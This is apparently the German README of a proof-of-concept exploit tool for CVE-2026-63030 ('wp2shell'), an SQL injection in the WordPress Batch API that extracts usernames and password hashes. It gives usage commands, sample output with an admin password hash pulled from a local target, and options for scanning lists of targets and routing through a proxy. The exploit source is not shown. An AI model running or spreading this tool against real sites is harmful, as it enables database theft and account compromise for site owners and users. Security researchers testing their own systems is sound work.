
CVE-2026-63030 (wp2shell) POC.
WordPress Batch API Desynchronisation SQL-Injection-Exploit
Proof-of-Concept-Tool zur Extraktion von Benutzern und Passwort-Hashes über die Schwachstelle CVE-2026-63030 (wp2shell).
python POC.py <target_url> [options]
python POC.py --rest-route http://target.com
[*] Scanning: http://127.0.0.1/
[*] 1 users found
[+] ID:1 User:admin Hash:$wp$2y$10$Z6gwPduKb7wAbm0bHht1be7SxrgbyxgnbPmTVcVz9nP1KBX811xQy
[*] Requests: 553
| Argument | Beschreibung | Standard |
|---|
target | Einzelne Ziel-URL | - |
-l, --list | Datei mit Liste von Zielen (eine pro Zeile) | - |
--prefix | Datenbanktabellen-Präfix | wp_ |
--rest-route | ?rest_route= verwenden | Deaktiviert |
--timeout | Request-Timeout (Sekunden) | 30 |
--proxy | HTTP-Proxy (Burp/ZAP-kompatibel) | Keine |
--max-len | Maximale Extraktionslänge | 255 |